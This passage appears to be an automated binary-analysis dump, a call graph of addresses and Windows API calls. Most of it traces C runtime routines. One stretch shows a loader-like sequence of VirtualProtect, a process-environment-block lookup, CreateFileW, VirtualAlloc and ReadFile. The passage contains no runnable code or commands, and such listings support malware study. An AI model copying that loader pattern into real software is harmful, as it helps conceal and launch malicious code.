1329739 6827->6831 6828->6829 6829->6815 6832 1329756 6831->6832 6833 1329745 6831->6833 6832->6829 6833->6832 6834 132567d __read_nolock 64 API calls 6833->6834 6834->6832 6836 132ade0 6835->6836 6837 132addb 6835->6837 6866 132afaa 6836->6866 6839 1325b55 __crtLCMapStringA_stat 5 API calls 6837->6839 6840 132a68c 6839->6840 6840->6818 6840->6829 6841 132adf6 6840->6841 6842 132ae36 GetCPInfo 6841->6842 6843 132aec0 6841->6843 6844 132aeab MultiByteToWideChar 6842->6844 6845 132ae4d 6842->6845 6846 1325b55 __crtLCMapStringA_stat 5 API calls 6843->6846 6844->6843 6850 132ae66 _strlen 6844->6850 6845->6844 6847 132ae53 GetCPInfo 6845->6847 6848 132a6ad 6846->6848 6847->6844 6849 132ae60 6847->6849 6848->6818 6848->6829 6849->6844 6849->6850 6851 132148f _malloc 64 API calls 6850->6851 6855 132ae98 _memset __crtLCMapStringA_stat 6850->6855 6851->6855 6852 132aef5 MultiByteToWideChar 6853 132af2c 6852->6853 6854 132af0d 6852->6854 6856 1329739 __crtLCMapStringA_stat 64 API calls 6853->6856 6857 132af31 6854->6857 6858 132af14 WideCharToMultiByte 6854->6858 6855->6843 6855->6852 6856->6843 6859 132af50 6857->6859 6860 132af3c WideCharToMultiByte 6857->6860 6858->6853 6861 1325750 __calloc_crt 64 API calls 6859->6861 6860->6853 6860->6859 6862 132af58 6861->6862 6862->6853 6863 132af61 WideCharToMultiByte 6862->6863 6863->6853 6864 132af73 6863->6864 6865 132567d __read_nolock 64 API calls 6864->6865 6865->6853 6869 132b1ef 6866->6869 6870 132b208 6869->6870 6871 132afc0 strtoxl 88 API calls 6870->6871 6872 132afbb 6871->6872 6872->6837 6874 132a16c LCMapStringW 6873->6874 6877 132a187 6873->6877 6875 132a18f GetLastError 6874->6875 6874->6877 6875->6877 6876 132a385 6879 132adad ___ansicp 88 API calls 6876->6879 6877->6876 6878 132a1e1 6877->6878 6880 132a1fa MultiByteToWideChar 6878->6880 6896 132a37c 6878->6896 6881 132a3ad 6879->6881 6886 132a227 6880->6886 6880->6896 6884 132a4a1 LCMapStringA 6881->6884 6885 132a3c6 6881->6885 6881->6896 6882 1325b55 __crtLCMapStringA_stat 5 API calls 6883 1328719 6882->6883 6883->6796 6887 132a3fd 6884->6887 6888 132adf6 ___convertcp 71 API calls 6885->6888 6891 132148f _malloc 64 API calls 6886->6891 6900 132a240 __crtLCMapStringA_stat 6886->6900 6890 132a4c8 6887->6890 6895 132567d __read_nolock 64 API calls 6887->6895 6892 132a3d8 6888->6892 6889 132a278 MultiByteToWideChar 6893 132a291 LCMapStringW 6889->6893 6894 132a373 6889->6894 6890->6896 6902 132567d __read_nolock 64 API calls 6890->6902 6891->6900 6892->6896 6897 132a3e2 LCMapStringA 6892->6897 6893->6894 6899 132a2b2 6893->6899 6898 1329739 __crtLCMapStringA_stat 64 API calls 6894->6898 6895->6890 6896->6882 6897->6887 6906 132a404 6897->6906 6898->6896 6901 132a2bb 6899->6901 6905 132a2e4 6899->6905 6900->6889 6900->6896 6901->6894 6903 132a2cd LCMapStringW 6901->6903 6902->6896 6903->6894 6904 132a333 LCMapStringW 6907 132a34b WideCharToMultiByte 6904->6907 6908 132a36d 6904->6908 6910 132a2ff __crtLCMapStringA_stat 6905->6910 6912 132148f _malloc 64 API calls 6905->6912 6909 132148f _malloc 64 API calls 6906->6909 6911 132a415 _memset __crtLCMapStringA_stat 6906->6911 6907->6908 6913 1329739 __crtLCMapStringA_stat 64 API calls 6908->6913 6909->6911 6910->6894 6910->6904 6911->6887 6914 132a453 LCMapStringA 6911->6914 6912->6910 6913->6894 6916 132a473 6914->6916 6917 132a46f 6914->6917 6918 132adf6 ___convertcp 71 API calls 6916->6918 6919 1329739 __crtLCMapStringA_stat 64 API calls 6917->6919 6918->6917 6919->6887 6920->6786 6922 1325e01 6921->6922 6923 1324fdb __encode_pointer 7 API calls 6922->6923 6924 1325e19 6922->6924 6923->6922 6924->6069 6928 1325da8 6925->6928 6927 1325df1 6927->6071 6929 1325db4 _doexit 6928->6929 6936 1322d18 6929->6936 6935 1325dd5 _doexit 6935->6927 6937 1321f64 __lock 64 API calls 6936->6937 6938 1322d1f 6937->6938 6939 1325cbd 6938->6939 6940 1325056 __decode_pointer 6 API calls 6939->6940 6941 1325cd1 6940->6941 6942 1325056 __decode_pointer 6 API calls 6941->6942 6943 1325ce1 6942->6943 6951 1325d64 6943->6951 6959 1329576 6943->6959 6945 1324fdb __encode_pointer 7 API calls 6947 1325d59 6945->6947 6946 1325cff 6948 1325d23 6946->6948 6955 1325d4b 6946->6955 6972 132579c 6946->6972 6949 1324fdb __encode_pointer 7 API calls 6947->6949 6948->6951 6952 132579c __realloc_crt 71 API calls 6948->6952 6953 1325d39 6948->6953 6949->6951 6956 1325dde 6951->6956 6952->6953 6953->6951 6954 1324fdb __encode_pointer 7 API calls 6953->6954 6954->6955 6955->6945 7022 1322d21 6956->7022 6960 1329582 _doexit 6959->6960 6961 1329592 6960->6961 6962 13295af 6960->6962 6964 13231da __mbsnbcmp_l 64 API calls 6961->6964 6963 13295f0 HeapSize 6962->6963 6965 1321f64 __lock 64 API calls 6962->6965 6968 13295a7 _doexit 6963->6968 6966 1329597 6964->6966 6969 13295bf ___sbh_find_block 6965->6969 6967 1323941 __mbsnbcmp_l 6 API calls 6966->6967 6967->6968 6968->6946 6977 1329610 6969->6977 6975 13257a5 6972->6975 6974 13257e4 6974->6948 6975->6974 6976 13257c5 Sleep 6975->6976 6981 13290eb 6975->6981 6976->6975 6980 1321e8a LeaveCriticalSection 6977->6980 6979 13295eb 6979->6963 6979->6968 6980->6979 6982 13290f7 _doexit 6981->6982 6983 13290fe 6982->6983 6984 132910c 6982->6984 6985 132148f _malloc 64 API calls 6983->6985 6986 1329113 6984->6986 6987 132911f 6984->6987 7002 1329106 _doexit __dosmaperr 6985->7002 6988 132567d __read_nolock 64 API calls 6986->6988 6994 1329291 6987->6994 7016 132912c ___sbh_resize_block ___sbh_find_block 6987->7016 6988->7002 6989 13292c4 6990 1323232 _malloc 6 API calls 6989->6990 6993 13292ca 6990->6993 6991 1321f64 __lock 64 API calls 6991->7016 6992 1329296 HeapReAlloc 6992->6994 6992->7002 6995 13231da __mbsnbcmp_l 64 API calls 6993->6995 6994->6989 6994->6992 6996 13292e8 6994->6996 6997 1323232 _malloc 6 API calls 6994->6997 6999 13292de 6994->6999 6995->7002 6998 13231da __mbsnbcmp_l 64 API calls 6996->6998 6996->7002 6997->6994 7000 13292f1 GetLastError 6998->7000 7003 13231da __mbsnbcmp_l 64 API calls 6999->7003 7000->7002 7002->6975 7005 132925f 7003->7005 7004 13291b7 HeapAlloc 7004->7016 7005->7002 7007 1329264 GetLastError 7005->7007 7006 132920c HeapReAlloc 7006->7016 7007->7002 7008 1322776 ___sbh_alloc_block 4 API calls 7008->7016 7009 1329277 7009->7002 7011 13231da __mbsnbcmp_l 64 API calls 7009->7011 7010 1323232 _malloc 6 API calls 7010->7016 7014 1329284 7011->7014 7012 132925a 7015 13231da __mbsnbcmp_l 64 API calls 7012->7015 7013 1327760 __VEC_memcpy _memcpy_s 7013->7016 7014->7000 7014->7002 7015->7005 7016->6989 7016->6991 7016->7002 7016->7004 7016->7006 7016->7008 7016->7009 7016->7010 7016->7012 7016->7013 7017 1321fc7 VirtualFree VirtualFree ___sbh_free_block 7016->7017 7018 132922f 7016->7018 7017->7016 7021 1321e8a LeaveCriticalSection 7018->7021 7020 1329236 7020->7016 7021->7020 7025 1321e8a LeaveCriticalSection 7022->7025 7024 1322d28 7024->6935 7025->7024 7075 1321585 7026->7075 7028 1321239 7029 1321bb2 7028->7029 7032 1321bbe _doexit 7029->7032 7030 1321bcc 7031 13231da __mbsnbcmp_l 64 API calls 7030->7031 7034 1321bd1 7031->7034 7032->7030 7033 1321bfa 7032->7033 7548 132332b 7033->7548 7036 1323941 __mbsnbcmp_l 6 API calls 7034->7036 7041 1321be1 _doexit 7036->7041 7041->6082 7043 1321ac6 _doexit 7042->7043 7044 1321af1 7043->7044 7045 1321ad4 7043->7045 7047 132332b __lock_file 65 API calls 7044->7047 7046 13231da __mbsnbcmp_l 64 API calls 7045->7046 7048 1321ad9 7046->7048 7049 1321af9 7047->7049 7050 1323941 __mbsnbcmp_l 6 API calls 7048->7050 7051 132191d __ftell_nolock 68 API calls 7049->7051 7053 1321ae9 _doexit 7050->7053 7052 1321b05 7051->7052 7627 1321b1e 7052->7627 7053->6084 7630 132186a 7055->7630 7057 1321290 VirtualProtect 7058 2b131e7 7057->7058 7070 2b13356 7057->7070 7800 2b1298f GetPEB 7058->7800 7060 2b13242 7801 2b13168 7060->7801 7062 2b1324a 7063 2b132dd 7062->7063 7064 2b132f9 CreateFileW 7062->7064 7063->6092 7064->7063 7065 2b13323 VirtualAlloc ReadFile 7064->7065 7065->7063 7068 2b13350 7065->7068 7066 2b13369 7066->6092 7068->7066 7069 2b1383b ExitProcess 7068->7069 7814 2b12b3a 7068->7814 7071 2b1335d 7070->7071 7072 2b13369 7071->7072 7073 2b12b3a 15 API calls 7071->7073 7074 2b1383b ExitProcess 7071->7074 7072->6092 7073->7071 7078 1321591 _doexit 7075->7078 7076 13215a4 7077 13231da __mbsnbcmp_l 64 API calls 7076->7077 7079 13215a9 7077->7079 7078->7076 7080 13215d9 7078->7080 7081 1323941 __mbsnbcmp_l 6 API calls 7079->7081 7094 13236d2 7080->7094 7091 13215b9 _doexit @_EH4_CallFilterFunc@8 7081->7091 7083 13215de 7084 13215f2 7083->7084 7085 13215e5 7083->7085 7087 1321619 7084->7087 7088 13215f9 7084->7088 7086 13231da __mbsnbcmp_l 64 API calls 7085->7086 7086->7091 7112 1323409 7087->7112 7089 13231da __mbsnbcmp_l 64 API calls 7088->7089 7089->7091 7091->7028 7095 13236de _doexit 7094->7095 7096 1321f64 __lock 64 API calls 7095->7096 7109 13236ec 7096->7109 7097 1323761 7137 1323801 7097->7137 7098 1323768 7099 132570b __malloc_crt 64 API calls 7098->7099 7101 1323772 7099->7101 7101->7097 7103 132561d __mtinitlocknum InitializeCriticalSectionAndSpinCount 7101->7103 7102 13237f6 _doexit 7102->7083 7106 1323797 7103->7106 7104 1321ea1 __mtinitlocknum 64 API calls 7104->7109 7107 13237a2 7106->7107 7108 13237b5 EnterCriticalSection 7106->7108 7110 132567d __read_nolock 64 API calls 7107->7110 7108->7097 7109->7097 7109->7098 7109->7104 7140 132336c 7109->7140 7145 13233da 7109->7145 7110->7097 7113 132342b 7112->7113 7114 132343f 7113->7114 7125 132345e 7113->7125 7115 13231da __mbsnbcmp_l 64 API calls 7114->7115 7116 1323444 7115->7116 7117 1323941 __mbsnbcmp_l 6 API calls 7116->7117 7122 1321624 7117->7122 7118 1323671 7121 13231da __mbsnbcmp_l 64 API calls 7118->7121 7119 132368b 7152 1326cf8 7119->7152 7123 1323676 7121->7123 7134 132163f 7122->7134 7124 1323941 __mbsnbcmp_l 6 API calls 7123->7124 7124->7122 7125->7118 7133 132361b 7125->7133 7155 132714e 7125->7155 7130 1326fca __fassign 99 API calls 7131 1323634 7130->7131 7132 1326fca __fassign 99 API calls 7131->7132 7131->7133 7132->7133 7133->7118 7133->7119 7541 132339e 7134->7541 7136 1321647 7136->7091 7150 1321e8a LeaveCriticalSection 7137->7150 7139 1323808 7139->7102 7141 1323379 7140->7141 7142 132338f EnterCriticalSection 7140->7142 7143 1321f64 __lock 64 API calls 7141->7143 7142->7109 7144 1323382 7143->7144 7144->7109 7146 13233ea 7145->7146 7147 13233fd LeaveCriticalSection 7145->7147 7151 1321e8a LeaveCriticalSection 7146->7151 7147->7109 7149 13233fa 7149->7109 7150->7139 7151->7149 7161 1326c2c 7152->7161 7154 1326d13 7154->7122 7488 1326fe4 7155->7488 7157 13235e6 7157->7118 7158 1326fca 7157->7158 7501 1326d9f 7158->7501 7164 1326c38 _doexit 7161->7164 7162 1326c4b 7163 13231da __mbsnbcmp_l 64 API calls 7162->7163 7165 1326c50 7163->7165 7164->7162 7166 1326c89 7164->7166 7167 1323941 __mbsnbcmp_l 6 API calls 7165->7167 7172 132650d 7166->7172 7171 1326c5f _doexit 7167->7171 7171->7154 7173 1326532 7172->7173 7237 1329c27 7173->7237 7176 1326553 7177 1323819 __invoke_watson 10 API calls 7176->7177 7178 132655d 7177->7178 7182 1326560 7178->7182 7179 1326596 7261 13231ed 7179->7261 7182->7179 7186 1326656 7182->7186 7183 13231da __mbsnbcmp_l 64 API calls 7184 13265a5 7183->7184 7185 1323941 __mbsnbcmp_l 6 API calls 7184->7185 7209 13265b4 7185->7209 7243 13275ba 7186->7243 7188 13266f8 7189 1326719 CreateFileA 7188->7189 7190 13266ff 7188->7190 7191 13267b3 GetFileType 7189->7191 7192 1326746 7189->7192 7193 13231ed __read_nolock 64 API calls 7190->7193 7196 13267c0 GetLastError 7191->7196 7197 1326804 7191->7197 7195 132677f GetLastError 7192->7195 7199 132675a CreateFileA 7192->7199 7194 1326704 7193->7194 7198 13231da __mbsnbcmp_l 64 API calls 7194->7198 7264 1323200 7195->7264 7201 1323200 __dosmaperr 64 API calls 7196->7201 7269 1327375 7197->7269 7203 132670e 7198->7203 7199->7191 7199->7195 7202 13267e9 CloseHandle 7201->7202 7202->7203 7204 13267f7 7202->7204 7207 13231da __mbsnbcmp_l 64 API calls 7203->7207 7206 13231da __mbsnbcmp_l 64 API calls 7204->7206 7208 13267fc 7206->7208 7207->7209 7208->7203 7233 1326cca 7209->7233 7210 1326a42 7210->7209 7213 1326baf CloseHandle CreateFileA 7210->7213 7215 1326bda GetLastError 7213->7215 7216 1326ab7 7213->7216 7217 1323200 __dosmaperr 64 API calls 7215->7217 7216->7209 7220 1326be6 7217->7220 7218 13231ed __read_nolock 64 API calls 7226 1326898 7218->7226 7219 1323be6 74 API calls __read_nolock 7219->7226 7359 13273f6 7220->7359 7225 13268a0 7225->7226 7231 13272f0 66 API calls __lseeki64_nolock 7225->7231 7288 1329a02 7225->7288 7303 132984c 7225->7303 7226->7210 7226->7219 7226->7225 7227 1326aaa 7226->7227 7230 132462e 66 API calls __lseek_nolock 7226->7230 7334 132839d 7226->7334 7228 1329a02 __close_nolock 67 API calls 7227->7228 7229 1326ab1 7228->7229 7232 13231da __mbsnbcmp_l 64 API calls 7229->7232 7230->7226 7231->7225 7232->7216 7234 1326cf6 7233->7234 7235 1326ccf 7233->7235 7234->7171 7487 1327593 LeaveCriticalSection 7235->7487 7238 1329c36 7237->7238 7240 132654e 7237->7240 7239 13231da __mbsnbcmp_l 64 API calls 7238->7239 7241 1329c3b 7239->7241 7240->7176 7240->7182 7242 1323941 __mbsnbcmp_l 6 API calls 7241->7242 7242->7240 7244 13275c6 _doexit 7243->7244 7245 1321ea1 __mtinitlocknum 64 API calls 7244->7245 7246 13275d6 7245->7246 7247 1321f64 __lock 64 API calls 7246->7247 7248 13275db _doexit 7246->7248 7260 13275ea 7247->7260 7248->7188 7250 13276c3 7251 1325750 __calloc_crt 64 API calls 7250->7251 7254 13276cc 7251->7254 7252 132766b EnterCriticalSection 7255 132767b LeaveCriticalSection 7252->7255 7252->7260 7253 1321f64 __lock 64 API calls 7253->7260 7259 132772d 7254->7259 7371 13274f3 7254->7371 7255->7260 7257 132561d __mtinitlocknum InitializeCriticalSectionAndSpinCount 7257->7260 7381 132774b 7259->7381 7260->7250 7260->7252 7260->7253 7260->7257 7260->7259 7368 132768d 7260->7368 7262 1325229 __getptd_noexit 64 API calls 7261->7262 7263 13231f2 7262->7263 7263->7183 7265 13231ed __read_nolock 64 API calls 7264->7265 7266 132320b __dosmaperr 7265->7266 7267 13231da __mbsnbcmp_l 64 API calls 7266->7267 7268 132321e 7267->7268 7268->7203 7270 1327383 7269->7270 7271 13273dc 7269->7271 7270->7271 7273 13273a7 7270->7273 7272 13231da __mbsnbcmp_l 64 API calls 7271->7272 7274 13273e1 7272->7274 7275 1326822 7273->7275 7277 13273cc SetStdHandle 7273->7277 7276 13231ed __read_nolock 64 API calls 7274->7276 7275->7210 7275->7226 7278 132462e 7275->7278 7276->7275 7277->7275 7389 132747c 7278->7389 7280 132463d 7281 1324653 SetFilePointer 7280->7281 7282 1324643 7280->7282 7284 1324672 7281->7284 7285 132466a GetLastError 7281->7285 7283 13231da __mbsnbcmp_l 64 API calls 7282->7283 7286 1324648 7283->7286 7284->7286 7287 1323200 __dosmaperr 64 API calls 7284->7287 7285->7284 7286->7218 7286->7226 7287->7286 7289 132747c __close_nolock 64 API calls 7288->7289 7292 1329a12 7289->7292 7290 1329a68 7291 13273f6 __free_osfhnd 65 API calls 7290->7291 7296 1329a70 7291->7296 7292->7290 7293 1329a46 7292->7293 7294 132747c __close_nolock 64 API calls 7292->7294 7293->7290 7295 132747c __close_nolock 64 API calls 7293->7295 7297 1329a3d 7294->7297 7298 1329a52 CloseHandle 7295->7298 7299 1329a92 7296->7299 7302 1323200 __dosmaperr 64 API calls 7296->7302 7300 132747c __close_nolock 64 API calls 7297->7300 7298->7290 7301 1329a5e GetLastError 7298->7301 7299->7225 7300->7293 7301->7290 7302->7299 7402 13272f0 7303->7402 7306 13298ce 7308 13231da __mbsnbcmp_l 64 API calls 7306->7308 7309 13298d9 7306->7309 7307 13272f0 __lseeki64_nolock 66 API calls 7311 1329887 7307->7311 7308->7309 7309->7225 7310 1329969 7316 13272f0 __lseeki64_nolock 66 API calls 7310->7316 7330 1329945 7310->7330 7311->7306 7311->7310 7312 13298ad GetProcessHeap HeapAlloc 7311->7312 7313 13298e0 __setmode_nolock 7312->7313 7314 13298c9 7312->7314 7325 132994c 7313->7325 7333 1329923 __setmode_nolock 7313->7333 7412 1327c6a 7313->7412 7317 13231da __mbsnbcmp_l 64 API calls 7314->7317 7315 13272f0 __lseeki64_nolock 66 API calls 7315->7306 7318 1329982 7316->7318 7317->7306 7318->7306 7319 132747c __close_nolock 64 API calls 7318->7319 7320 1329998 SetEndOfFile 7319->7320 7321 13299b5 7320->7321 7320->7330 7323 13231da __mbsnbcmp_l 64 API calls 7321->7323 7324 13299ba 7323->7324 7327 13231ed __read_nolock 64 API calls 7324->7327 7326 13231ed __read_nolock 64 API calls 7325->7326 7328 1329951 7326->7328 7329 13299c5 GetLastError 7327->7329 7332 13231da __mbsnbcmp_l 64 API calls 7328->7332 7328->7333 7329->7330 7330->7306 7330->7315 7331 1329931 GetProcessHeap 7331->7330 7332->7333 7333->7331 7335 13283a9 _doexit 7334->7335 7336 13283b1 7335->7336 7339 13283cc 7335->7339 7338 13231ed __read_nolock 64 API calls 7336->7338 7337 13283da 7340 13231ed __read_nolock 64 API calls 7337->7340 7341 13283b6 7338->7341 7339->7337 7343 132841b 7339->7343 7342 13283df 7340->7342 7344 13231da __mbsnbcmp_l 64 API calls 7341->7344 7345 13231da __mbsnbcmp_l 64 API calls 7342->7345 7346 13274f3 ___lock_fhandle 65 API calls 7343->7346 7354 13283be _doexit 7344->7354 7347 13283e6 7345->7347 7348 1328421 7346->7348 7349 1323941 __mbsnbcmp_l 6 API calls 7347->7349 7350 1328444 7348->7350 7351 132842e 7348->7351 7349->7354 7353 13231da __mbsnbcmp_l 64 API calls 7350->7353 7352 1327c6a __write_nolock 96 API calls 7351->7352 7355 132843c 7352->7355 7356 1328449 7353->7356 7354->7226 7483 132846f 7355->7483 7357 13231ed __read_nolock 64 API calls 7356->7357 7357->7355 7360 1327462 7359->7360 7361 1327407 7359->7361 7362 13231da __mbsnbcmp_l 64 API calls 7360->7362 7361->7360 7366 1327432 7361->7366 7363 1327467 7362->7363 7364 13231ed __read_nolock 64 API calls 7363->7364 7365 1327458 7364->7365 7365->7216 7366->7365 7367 1327452 SetStdHandle 7366->7367 7367->7365 7384 1321e8a LeaveCriticalSection 7368->7384 7370 1327694 7370->7260 7372 13274ff _doexit 7371->7372 7373 132755a 7372->7373 7376 1321f64 __lock 64 API calls 7372->7376 7374 132755f EnterCriticalSection 7373->7374 7375 132757c _doexit 7373->7375 7374->7375 7375->7259 7377 132752b 7376->7377 7378 1327542 7377->7378 7380 132561d __mtinitlocknum InitializeCriticalSectionAndSpinCount 7377->7380 7385 132758a 7378->7385 7380->7378 7388 1321e8a LeaveCriticalSection 7381->7388 7383 1327752 7383->7248 7384->7370 7386 1321e8a _doexit LeaveCriticalSection 7385->7386 7387 1327591 7386->7387 7387->7373 7388->7383 7390 1327489 7389->7390 7393 13274a1 7389->7393 7391 13231ed __read_nolock 64 API calls 7390->7391 7392 132748e 7391->7392 7395 13231da __mbsnbcmp_l 64 API calls 7392->7395 7394 13231ed __read_nolock 64 API calls 7393->7394 7396 13274e6 7393->7396 7397 13274cf 7394->7397 7398 1327496 7395->7398 7396->7280 7399 13231da __mbsnbcmp_l 64 API calls 7397->7399 7398->7280 7400 13274d6 7399->7400 7401 1323941 __mbsnbcmp_l 6 API calls 7400->7401 7401->7396 7403 132747c __close_nolock 64 API calls 7402->7403 7404 132730e 7403->7404 7405 1327316 7404->7405 7406 1327327 SetFilePointer 7404->7406 7407 13231da __mbsnbcmp_l 64 API calls 7405->7407 7408 132733f GetLastError 7406->7408 7410 132731b 7406->7410 7407->7410 7409 1327349 7408->7409 7408->7410 7411 1323200 __dosmaperr 64 API calls 7409->7411 7410->7306 7410->7307 7411->7410 7413 1327c79 __write_nolock 7412->7413 7414 1327cd2 7413->7414 7415 1327cab 7413->7415 7445 1327ca0 7413->7445 7418 1327d14 7414->7418 7422 1327d3a 7414->7422 7417 13231ed __read_nolock 64 API calls 7415->7417 7416 1325b55 __crtLCMapStringA_stat 5 API calls 7419 132839b 7416->7419 7420 1327cb0 7417->7420 7421 13231ed __read_nolock 64 API calls 7418->7421 7419->7313 7424 13231da __mbsnbcmp_l 64 API calls 7420->7424 7425 1327d19 7421->7425 7423 1327d4e 7422->7423 7426 13272f0 __lseeki64_nolock 66 API calls 7422->7426 7471 132a0b1 7423->7471 7427 1327cb7 7424->7427 7430 13231da __mbsnbcmp_l 64 API calls 7425->7430 7426->7423 7431 1323941 __mbsnbcmp_l 6 API calls 7427->7431 7429 1327d59 7432 1327fff 7429->7432 7437 13252a2 __getptd 64 API calls 7429->7437 7433 1327d22 7430->7433 7431->7445 7435 13282ce WriteFile 7432->7435 7436 132800f 7432->7436 7434 1323941 __mbsnbcmp_l 6 API calls 7433->7434 7434->7445 7440 1328301 GetLastError 7435->7440 7441 1327fe1 7435->7441 7438 13280ed 7436->7438 7461 1328023 7436->7461 7439 1327d74 GetConsoleMode 7437->7439 7460 13281cd 7438->7460 7463 13280fc 7438->7463 7439->7432 7443 1327d9f 7439->7443 7440->7441 7442 132834c 7441->7442 7441->7445 7447 132831f 7441->7447 7442->7445 7446 13231da __mbsnbcmp_l 64 API calls 7442->7446 7443->7432 7444 1327db1 GetConsoleCP 7443->7444 7444->7441 7469 1327dd4 7444->7469 7445->7416 7449 132836f 7446->7449 7451 132832a 7447->7451 7452 132833e 7447->7452 7448 1328091 WriteFile 7448->7440 7448->7461 7457 13231ed __read_nolock 64 API calls 7449->7457 7450 1328233 WideCharToMultiByte 7450->7440 7454 132826a WriteFile 7450->7454 7453 13231da __mbsnbcmp_l 64 API calls 7451->7453 7456 1323200 __dosmaperr 64 API calls 7452->7456 7458 132832f 7453->7458 7459 13282a1 GetLastError 7454->7459 7454->7460 7455 1328171 WriteFile 7455->7440 7455->7463 7456->7445 7457->7445 7462 13231ed __read_nolock 64 API calls 7458->7462 7459->7460 7460->7441 7460->7442 7460->7450 7460->7454 7461->7441 7461->7442 7461->7448 7462->7445 7463->7441 7463->7442 7463->7455 7465 1329e70 11 API calls __putwch_nolock 7465->7469 7466 1327e80 WideCharToMultiByte 7466->7441 7468 1327eb1 WriteFile 7466->7468 7467 132a04c 76 API calls __fassign 7467->7469 7468->7440 7468->7469 7469->7440 7469->7441 7469->7465 7469->7466 7469->7467 7470 1327f05 WriteFile 7469->7470 7480 132a09e 7469->7480 7470->7440 7470->7469 7472 132a0be 7471->7472 7473 132a0cd 7471->7473 7474 13231da __mbsnbcmp_l 64 API calls 7472->7474 7476 132a0f1 7473->7476 7477 13231da __mbsnbcmp_l 64 API calls 7473->7477 7475 132a0c3 7474->7475 7475->7429 7476->7429 7478 132a0e1 7477->7478 7479 1323941 __mbsnbcmp_l 6 API calls 7478->7479 7479->7476 7481 132a066 __isleadbyte_l 74 API calls 7480->7481 7482 132a0ad 7481->7482 7482->7469 7486 1327593 LeaveCriticalSection 7483->7486 7485 1328477 7485->7354 7486->7485 7487->7234 7489 1326ffb 7488->7489 7500 1326ff4 _strncmp 7488->7500 7490 1326d18 _LocaleUpdate::_LocaleUpdate 74 API calls 7489->7490 7491 1327007 7490->7491 7492 1327065 7491->7492 7493 132703a 7491->7493 7491->7500 7495 13231da __mbsnbcmp_l 64 API calls 7492->7495 7492->7500 7494 13231da __mbsnbcmp_l 64 API calls 7493->7494 7496 132703f 7494->7496 7497 1327072 7495->7497 7498 1323941 __mbsnbcmp_l 6 API calls 7496->7498 7499 1323941 __mbsnbcmp_l 6 API calls 7497->7499 7498->7500 7499->7500 7500->7157 7502 1326d18 _LocaleUpdate::_LocaleUpdate 74 API calls 7501->7502 7503 1326db3 7502->7503 7504 1326dd5 7503->7504 7505 1326dfb 7503->7505 7515 1323614 7503->7515 7516 1329d52 7504->7516 7507 1326e00 7505->7507 7508 1326e2e 7505->7508 7509 13231da __mbsnbcmp_l 64 API calls 7507->7509 7511 13231da __mbsnbcmp_l 64 API calls 7508->7511 7508->7515 7510 1326e05 7509->7510 7513 1323941 __mbsnbcmp_l 6 API calls 7510->7513 7512 1326e3b 7511->7512 7514 1323941 __mbsnbcmp_l 6 API calls 7512->7514 7513->7515 7514->7515 7515->7130 7515->7133 7517 1329d62 7516->7517 7522 1329d94 7516->7522 7518 1329d67 7517->7518 7517->7522 7520 13231da __mbsnbcmp_l 64 API calls 7518->7520 7521 1329d6c 7520->7521 7523 1323941 __mbsnbcmp_l 6 API calls 7521->7523 7525 1329c60 7522->7525 7524 1329d7c 7523->7524 7524->7515 7526 1329c76 7525->7526 7539 1329c9b ___ascii_strnicmp 7525->7539 7527 1326d18 _LocaleUpdate::_LocaleUpdate 74 API calls 7526->7527 7528 1329c81 7527->7528 7529 1329c86 7528->7529 7531 1329cbb 7528->7531 7530 13231da __mbsnbcmp_l 64 API calls 7529->7530 7532 1329c8b 7530->7532 7533 1329cc5 7531->7533 7540 1329ced 7531->7540 7535 1323941 __mbsnbcmp_l 6 API calls 7532->7535 7534 13231da __mbsnbcmp_l 64 API calls 7533->7534 7536 1329cca 7534->7536 7535->7539 7538 1323941 __mbsnbcmp_l 6 API calls 7536->7538 7537 132abdd 99 API calls __tolower_l 7537->7540 7538->7539 7539->7524 7540->7537 7540->7539 7542 13233ce LeaveCriticalSection 7541->7542 7543 13233af 7541->7543 7542->7136 7543->7542 7544 13233b6 7543->7544 7547 1321e8a LeaveCriticalSection 7544->7547 7546 13233cb 7546->7136 7547->7546 7549 132335f EnterCriticalSection 7548->7549 7550 132333d 7548->7550 7552 1321c02 7549->7552 7550->7549 7551 1323345 7550->7551 7553 1321f64 __lock 64 API calls 7551->7553 7554 1321b28 7552->7554 7553->7552 7555 1321b48 7554->7555 7556 1321b38 7554->7556 7558 1321b5a 7555->7558 7606 132191d 7555->7606 7557 13231da __mbsnbcmp_l 64 API calls 7556->7557 7565 1321b3d 7557->7565 7569 132477f 7558->7569 7566 1321c2d 7565->7566 7567 132339e _ftell 2 API calls 7566->7567 7568 1321c35 7567->7568 7568->7041 7570 1321b68 7569->7570 7571 1324798 7569->7571 7575 13242a5 7570->7575 7571->7570 7572 13242a5 __fileno 64 API calls 7571->7572 7573 13247b3 7572->7573 7574 132839d __locking 98 API calls 7573->7574 7574->7570 7576 1321b9a 7575->7576 7577 13242b4 7575->7577 7581 13246a3 7576->7581 7578 13231da __mbsnbcmp_l 64 API calls 7577->7578 7579 13242b9 7578->7579 7580 1323941 __mbsnbcmp_l 6 API calls 7579->7580 7580->7576 7582 13246af _doexit 7581->7582 7583 13246d2 7582->7583 7584 13246b7 7582->7584 7585 13246e0 7583->7585 7591 1324721 7583->7591 7586 13231ed __read_nolock 64 API calls 7584->7586 7588 13231ed __read_nolock 64 API calls 7585->7588 7587 13246bc 7586->7587 7589 13231da __mbsnbcmp_l 64 API calls 7587->7589 7590 13246e5 7588->7590 7601 13246c4 _doexit 7589->7601 7592 13231da __mbsnbcmp_l 64 API calls 7590->7592 7593 13274f3 ___lock_fhandle 65 API calls 7591->7593 7595 13246ec 7592->7595 7594 1324727 7593->7594 7596 1324734 7594->7596 7597 132474a 7594->7597 7598 1323941 __mbsnbcmp_l 6 API calls 7595->7598 7599 132462e __lseek_nolock 66 API calls 7596->7599 7600 13231da __mbsnbcmp_l 64 API calls 7597->7600 7598->7601 7602 1324742 7599->7602 7603 132474f 7600->7603 7601->7565 7623 1324775 7602->7623 7604 13231ed __read_nolock 64 API calls 7603->7604 7604->7602 7607 1321950 7606->7607 7608 1321930 7606->7608 7610 13242a5 __fileno 64 API calls 7607->7610 7609 13231da __mbsnbcmp_l 64 API calls 7608->7609 7611 1321935 7609->7611 7612 1321956 7610->7612 7613 1323941 __mbsnbcmp_l 6 API calls 7611->7613 7614 13246a3 __locking 68 API calls 7612->7614 7622 1321945 7613->7622 7615 132196b 7614->7615 7616 13219df 7615->7616 7618 132199a 7615->7618 7615->7622 7617 13231da __mbsnbcmp_l 64 API calls 7616->7617 7617->7622 7619 13246a3 __locking 68 API calls 7618->7619 7618->7622 7620 1321a3a 7619->7620 7621 13246a3 __locking 68 API calls 7620->7621 7620->7622 7621->7622 7622->7558 7626 1327593 LeaveCriticalSection 7623->7626 7625 132477d 7625->7601 7626->7625 7628 132339e _ftell 